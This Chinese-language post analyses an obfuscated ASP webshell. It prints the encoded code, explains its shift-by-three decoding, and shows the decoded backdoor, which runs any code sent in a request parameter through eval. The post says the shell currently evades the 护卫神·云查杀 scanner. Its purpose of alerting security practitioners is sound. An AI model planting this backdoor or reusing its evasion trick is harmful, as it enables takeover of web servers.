近期发现一段来自马来西亚的恶意代码,经过简单加密处理,其真实用途引人深思。现将代码贴出,供大家自行测试验证。
代码如下:
<%
codeds="Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li"
execute (decode (codeds) )
Function DeCode (Coded)
On Error Resume Next
For i = 1 To Len (Coded)
Curchar = Mid (Coded, i, 1)
If Asc (Curchar) = 16 then
Curchar = chr (8)
Elseif Asc (Curchar) = 24 then
Curchar = chr (12)
Elseif Asc (Curchar) = 32 then
Curchar = chr (18)
Else
Curchar = chr (Asc (Curchar) -3)
End if
DeCode = Decode&Curchar
Next
End Function
response.write(decode(codeds))
%>
加密逻辑较为简单:将每个字符的ASCII码减去3,遇到特定数值(16、24、32)则映射为对应固定字符。解密后的核心代码如下:
<%
If request("xx") ="x" then eval request("hkmjj") end if
%>
这是一个典型的Webshell后门入口——通过GET请求参数xx传入特定值,即可触发eval函数执行任意恶意代码。经实际测试,该代码在当前版本的护卫神·云查杀系统中能够顺利绕过,而该查杀系统目前应用范围广泛,值得安全从业者高度关注。
